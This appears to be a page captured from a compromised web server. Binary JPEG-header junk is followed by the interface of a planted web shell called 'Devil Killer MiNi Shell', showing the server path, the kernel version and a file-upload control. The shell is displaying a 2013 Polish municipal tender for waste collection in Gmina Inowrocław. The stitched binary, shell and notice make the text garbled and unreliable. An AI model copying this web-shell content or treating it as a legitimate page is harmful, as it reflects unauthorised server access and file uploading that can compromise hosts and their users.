JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/171620-N-2013.html

<p class="kh_header"><b>Inowrocław: Odbieranie i zagospodarowanie zmieszanych i zbieranych selektywnie odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Inowrocław</b><br>
<b>Numer ogłoszenia: 171620 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Inowrocław , ul. Królowej Jadwigi 43, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3570251, faks 52 3540490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inowroclaw.ug.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.inowroclaw.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie zmieszanych i zbieranych selektywnie odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Inowrocław.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pn.: Odbieranie i zagospodarowanie zmieszanych i zbieranych selektywnie odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Inowrocław.
I. CHARAKTERYSTYKA GMINY INOWROCŁAW
1.	Powierzchnia
Powierzchnia Gminy Inowrocław: 171,05 km2,

2.	Liczba mieszkańców
Szacunkowa liczba mieszkańców Gminy Inowrocław według stanu z ewidencji ludności na dzień 26.03.2013 r. wynosi  11541 osób.

3. Ilość odebranych odpadów komunalnych od mieszkańców Gminy Inowrocław w latach 2009-2012

Kod odpadów: 20 03 01
Rodzaj odpadów: niesegregowane (zmieszane) odpady komunalne
Masa [Mg]: 
2013,1 - 2009 rok
1978,7 - 2010 rok
2077,37 - 2011 rok
1642,7 - 2012 rok


Kod odpadów: 15 01 02
Rodzaj odpadów: Opakowania z tworzyw sztucznych 
Masa [Mg]: 
4,14 - 2009 rok
3,12 - 2010 rok
33,98 - 2011 rok
83,3 - 2012 rok


Kod odpadów: 15 01 07
Rodzaj odpadów: Opakowania ze szkła
Masa [Mg]: 
99,86 - 2009 rok
126,5 - 2010 rok
179,08 - 2011 rok
153,6 - 2012 rok


Kod odpadów: 15 01 01
Rodzaj odpadów: Opakowania z papieru i tektury
Masa [Mg]: 
0 - 2009 rok
0 - 2010 rok
6,148 - 2011 rok
0,3 - 2012 rok


Kod odpadów: 20 02 01
Rodzaj odpadów: Inne odpady nie ulegające biodegradacji
Masa [Mg]: 
0 - 2009 rok
0 - 2010 rok
0 - 2011 rok
4,1 - 2012 rok

Łączna masa [Mg] odpadów:
2117,1	- 2009 rok
2108,32 - 2010 rok
2296,578 - 2011 rok
1884,0 - 2012 rok

Wyżej wymienione ilości odpadów wynikają ze sprawozdań przekazywanych przez podmioty odbierające odpady z terenu gminy nie wyłączając ogrodów działkowych oraz jednostek gospodarczych. Zamawiający informuje również, że w w/w latach 80% mieszkańców posiadało zawarte umowy na odbiór odpadów. Wielce prawdopodobnym jest, że na tym poziomie będą odbierane odpady w okresie obowiązywania umowy. Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia i/lub odszkodowania za osiągnięcie innych wielkości.


II. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest odbieranie i zagospodarowanie wskazanych w opisie zamówienia odpadów komunalnych z nieruchomości położonych na terenie Gminy Inowrocław, na których zamieszkują mieszkańcy w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych  do  składowania,  zgodnie  z  zapisami  ustawy  z  dnia  13  września  1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 z późn. zm.), zapisami Planu Gospodarki Odpadami, przyjętego Uchwałą Sejmiku Województwa Kujawsko-Pomorskiego Nr XXVI/434/12 z dnia 24 września 2012 roku w sprawie uchwalenia Planu Gospodarki Odpadami Województwa Kujawsko-Pomorskiego na lata 2012- 2017 z perspektywą na lata 2018-2023 z załącznikami oraz przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy Inowrocław - Uchwała nr XXV/206/2013 Rady Gminy Inowrocław z dnia 20 marca 2013 r.
Wykonawca będzie rozliczał się miesięcznie z Zamawiającym w zakresie zapłaty za usługę, która obejmuje:
- zbieranie i transport do wyznaczonego miejsca odpadów komunalnych zmieszanych i segregowanych wraz z wszystkimi kosztami i opłatami z tym związanymi (zbieranie, transport,  opłata za gospodarowanie i składowanie odpadów).

1.	Wykaz urządzeń i sprzętu technicznego 
a) Sprzęt techniczny
Wykonawca zobowiązany będzie realizować zamówienie przy wykorzystaniu minimum sprzętu, o jakim mowa w § 5 ust.1 pkt.c SIWZ. Ponadto Zamawiający wymaga, aby pojazd/załoga do odbierania odpadów posiadał cyfrowy aparat fotograficzny, który umożliwi monitorowanie i kontrolę segregacji odpadów na terenie poszczególnych nieruchomości. W zakresie utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń należy zapewnić, aby urządzenia utrzymane były we właściwym stanie technicznym i sanitarnym. Pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów podczas ich magazynowania, przeładunku, a także transportu. Pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na 2 tygodnie. Wykonawca zobowiązany będzie posiadać dokumenty potwierdzające wykonanie tych czynności. Pojazdy muszą na koniec dnia roboczego zostać opróżnione z odpadów i zaparkowane na terenie bazy magazynowo-transportowej.  


III. SZCZEGÓŁOWE  DANE CHARAKTERYZUJĄCE ZAMÓWIENIE

W zakres przedmiotu zamówienia wchodzi odbieranie od właścicieli nieruchomości z terenu gminy Inowrocław następujących rodzajów odpadów:
- zmieszanych odpadów komunalnych - w każdej ilości,
- papieru i tektury - w każdej ilości,
- szkła - w każdej ilości,
- tworzyw sztucznych, metali oraz opakowań wielomateriałowych - w każdej ilości.

Średnia ilość odpadów komunalnych, zbieranych w okresie realizacji zamówienia na terenie Gminy Inowrocław, szacunkowo wyniosła w okresie 2009-2012 łącznie ok. 2101,49 Mg/rok z czego:
- zmieszanych odpadów komunalnych ok. 1927, 96 Mg/rok
- zbieranych selektywnie 
- papier i tektura ok. 3,22 Mg/rok
- szkło ok. 139,76 Mg/rok
- tworzywa sztuczne, opakowania wielomateriałowe, metal ok. 31,14 Mg/rok

Ostateczna ilość odpadów będzie znana w wyniku realizacji zadania. Ilość odpadów komunalnych może zależeć od pory roku.

Szacunkowa liczba zameldowanych mieszkańców Gminy Inowrocław według stanu z ewidencji ludności na dzień 26.03.2013 r. wynosi 11541 osób.
W poszczególnych miejscowościach liczba zameldowanych osób wynosi:
Balczewo - 260
Balin - 109
Batkowo - 153
Borkowo - 188
Cieślin - 496
Czyste - 142
Dulsk - 187
Dziennice - 138
Gnojno - 395
Góra - 216
Jacewo - 610
Jaksice - 1130 w tym ulice:
a)	Dworcowa - 63
b)	Krótka - 19
c)	Łączna - 21
d)	Nowe Osiedle - 105
e)	Polna - 27
f)	Powstańców Wielkopolskich - 88
g)	Słoneczna - 55
h)	Sportowa - 13
i)	Spółdzielcza - 201
j)	Szkolna - 127
k)	Szosa Bydgoska - 183
l)	Wschodnia - 171 
Jaksiczki - 62
Jaronty - 123
Karczyn wieś - 58
Kłopot - 434
Komaszyce - 390
Krusza Duchowna - 185
Krusza Podlotowa - 151
Krusza Zamkowa - 235
Kruśliwiec - 107
Latkowo - 187
Łąkocin - 191
Łojewo - 488
Marcinkowo - 209
Marulewy - 180
Miechowice - 160
Mimowola - 5
Olszewice - 100
Oporówek - 112
Orłowo - 610
Ostrowo Krzyckie - 33
Piotrkowice - 164
Pławin - 241
Pławinek - 148
Popowice - 46
Radłówek - 162
Sikorowo - 435
Sławęcin - 125
Sławęcinek - 317
Słońsko - 429
Sójkowo - 78
Stefanowo - 89
Strzemkowo - 69
Trzaski - 184
Tupadły - 561
Turlejewo - 90
Turzany - 169
Witowy - 110
Żalinowo - 80
Na terenie Gminy Inowrocław znajduje się 18 wspólnot mieszkaniowych. Łączna szacunkowa ilość adresów nieruchomości na terenie Gminy Inowrocław wynosi ok. 3173, z czego:
1) Wspólnota Mieszkaniowa Trzaski			Liczba lokali - 30 
2) Wspólnota Mieszkaniowa Cieślin 19		Liczba lokali - 8 
3) Wspólnota mieszkaniowa Cieślin 21		Liczba lokali - 8 
4) Wspólnota Mieszkaniowa Cieślin 27 		Liczba lokali - 8 
5) Wspólnota Mieszkaniowa Cieślin 28 		Liczba lokali - 8 
6) Wspólnota Mieszkaniowa Cieślin 29 		Liczba lokali - 8 
7) Wspólnota Mieszkaniowa Cieślin 30 		Liczba  lokali - 8 
8) Wspólnota Mieszkaniowa Cieślin 31 		Liczba lokali - 18 
9) Wspólnota Mieszkaniowa Cieślin 32 		Liczba lokali - 18 
10) Wspólnota Mieszkaniowa Cieślin 33 		Liczba lokali - 18 
11) Wspólnota Mieszkaniowa Sikorowo 45 	Liczba lokali - 20 
12) Wspólnota mieszkaniowa  Jaksice 		Liczba lokali - 12 
13) Wspólnota mieszkaniowa Dulsk 6A 		Liczba lokali - 18 
14) Wspólnota mieszkaniowa Ostrowo Krzyckie I-	Liczba lokali - 6 
15) Wspólnota mieszkaniowa Ostrowo Krzyckie II-Liczba lokali - 6 
16) Wspólnota Mieszkaniowa Dziennice 		Liczba lokali - 9 
17) Spółdzielnia Mieszkaniowa Wierzchosławice w Wierzchosławicach - budynek Spółdzielni Gnojno 2, 3, 4, 6, 7, 8, 9, 10, 11, 16, 26		Liczna lokali - 97 
18) Wspólnota Mieszkaniowa Kłopot 32		Liczba lokali - 12 

Ponadto na terenie gminy znajdują się budynki wielolokalowe w miejscowości Borkowo, Kruśliwiec Łojewo. Dokładne dane zostaną podane Wykonawcy wraz ze szczegółowym wykazem adresów po zawarciu umowy w terminie 30 dni przed rozpoczęciem realizacji zamówienia. Ilość nieruchomości z których będą odbierane odpady komunalne może ulec zmianie - należy uwzględnić zmianę trasy - zmiana ilości adresów i trasy nie powoduje zmiany wartości usługi.
W trakcie realizacji przedmiotu zamówienia liczba ta może ulec zmianie maksymalnie do 5 %. 
Urządzenia do gromadzenia odpadów: pojemniki, kontenery i worki, które na czas odbierania odpadów właściciel nieruchomości jest obowiązany udostępnić poprzez ich wystawienie w miejsce umożliwiające swobodny do nich dostęp..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.10.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek uprawnień do wykonywania określonej działalności, zamawiający wymaga złożenia: 
a)	zezwolenia na zbieranie odpadów 
b)	zezwolenia na przetwarzanie odpadów, w przypadku wykonywania procesów odzysku lub unieszkodliwiania, w tym przygotowania poprzedzającego odzysk lub unieszkodliwianie
c)	aktualnego zaświadczenia o wpisie do rejestru działalności regulowanej w Gminie Inowrocław, zgodnie z art. 9 c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach,
d)	zezwolenia na transport odpadów wydane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001 r. (Dz. U. z 2010 Nr 185, poz. 1243 z późn. zm.), w związku z art. 233 ustawy z dnia 14 grudnia 2012 r. (Dz. U.z 2013 r. poz. 21)
Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności,  do wykonania zamówienia zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z Załącznikiem 2 do SIWZ
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek Zamawiający wymaga by wykazał, iż wykonał,  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi odbierania i zagospodarowania zmieszanych i zbieranych selektywnie odpadów komunalnych z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy lub usługi zostały wykonane lub są wykonywane należycie. Zamawiający żąda, aby wykonawca wykazał odbiór roczny odpadów w ilości nie mniejszej niż 2200 Mg, w każdym roku prowadzonej działalności objętej informacją.
Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, do wykonania zamówienia zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z Załącznikiem 2 do SIWZ.   
Wykaz wykonanych usług stanowi Załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym zamawiający wymaga, by wykonawca wykazał iż dysponuje sprzętem w ilości pozwalającej na sprawne zrealizowanie zamówienia i dotrzymanie terminu jego zrealizowania. Zamawiający żąda, aby Wykonawca wykazał co najmniej 2 pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, co najmniej 2 pojazdy przystosowane do odbierania selektywnie zbieranych odpadów komunalnych oraz co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej wraz z podstawą dysponowania tym sprzętem oraz oświadczenie, że wykazany sprzęt jest wystarczający do sprawnej i terminowej realizacji zamówienia. Pojazdy te muszą być  trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości. Ponadto wykonawca musi dysponować bazą magazynowo - transportową usytuowaną na terenie Gminy Inowrocław lub w odległości nie większej niż 60 km od granic gminy. Baza powinna być usytuowana na terenie, do którego Wykonawca posiada tytuł prawny. Baza magazynowo - transportowa winna spełniać wymagania, o których mowa w Rozporządzeniu Ministra Środowiska w sprawie szczegółowych wymagań odbierania odpadów komunalnych od właścicieli nieruchomości z dnia 11 stycznia 2013 roku (Dz. U. z 2013 r. poz. 122). 
Dla uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym zamawiający wymaga złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z Załącznikiem 2 do SIWZ.
Wykaz narzędzi, wyposażenia zakładu  i  urządzeń technicznych,  które dostępne są wykonawcy w celu realizacji zamówienia, stanowi Załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z Załącznikiem 2 do SIWZ.
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek sytuacji ekonomicznej i finansowej, Zamawiający wymaga, by wykonawca wykazał posiadanie opłaconej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 200.000 zł dokument określony w § 6 pkt.I ppkt.4 SIWZ.

Dla uznania, że Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej umożliwiającej realizacje zamówienia zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z Załącznikiem 2 do SIWZ.
Zamawiający dokona oceny spełniania w/w warunków na podstawie kompletności złożonych dokumentów, zgodnie z formułą /spełnia - nie spełnia/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

